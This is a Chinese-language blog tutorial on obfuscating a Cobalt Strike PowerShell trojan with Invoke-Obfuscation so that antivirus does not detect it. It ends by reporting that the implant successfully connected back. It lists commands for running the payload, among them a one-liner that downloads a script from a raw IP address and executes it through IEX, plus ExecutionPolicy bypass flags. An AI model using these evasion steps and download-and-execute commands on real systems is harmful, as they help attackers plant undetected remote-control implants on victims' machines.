梦中

发表文章数:82

首页 » 免杀,钓鱼 » 正文

0x001-针对powershell免杀

工具:Invoke-Obfuscation

操作实例:

1、利用CS生成powershell木马

cobalt strike木马免杀(powershell,exe)

cobalt strike木马免杀(powershell,exe)

 

 2、进入invoke-Obsfuscation文件,使用powershell命令执行

 

invoke-Obsfuscation目录打开cmd 执行powershell

然后在在powershell中执行Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation

cobalt strike木马免杀(powershell,exe)

 

然后执行set scriptpath c:\test\shell.ps1 指定待处理的Ps1文件

 

cobalt strike木马免杀(powershell,exe)

 

然后选择编码模式

 

cobalt strike木马免杀(powershell,exe)

 

 

 返回上一级 选择字符串混搅功能 这里我选择1

cobalt strike木马免杀(powershell,exe)

 

 

 

 输出免杀后的power shell文件

 

cobalt strike木马免杀(powershell,exe)

 

查看免杀效果

cobalt strike木马免杀(powershell,exe)

然后利用powershell命令执行免杀后的ps1文件,成功上线

 

powershell Get-Content 1.ps1 | powershell -NoProfile -
1.本地读取然后通过管道符运行

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.129/ps/a.ps1')"
2.远程下载并通过IEX运行脚本

powershell -ExecutionPolicy bypass -File ./a.ps1
3.Bypass执行策略绕过
不会显示警告和提示

powershell -ExecutionPolicy unrestricted -File ./a.ps1
4.Unrestricted执行策略标志

 

cobalt strike木马免杀(powershell,exe)

 

未经允许不得转载:作者:梦中, 转载或复制请以 超链接形式 并注明出处 梦中博客
原文地址:《cobalt strike木马免杀(powershell,exe)》 发布于2020-10-22

分享到:
赞(0) 生成海报

评论 抢沙发

2 + 2 =


长按图片转发给朋友

Vieu4.5主题
专业打造轻量级个人企业风格博客主题!专注于前端开发,全站响应式布局自适应模板。
切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

Q Q 登 录
微 博 登 录
切换登录

注册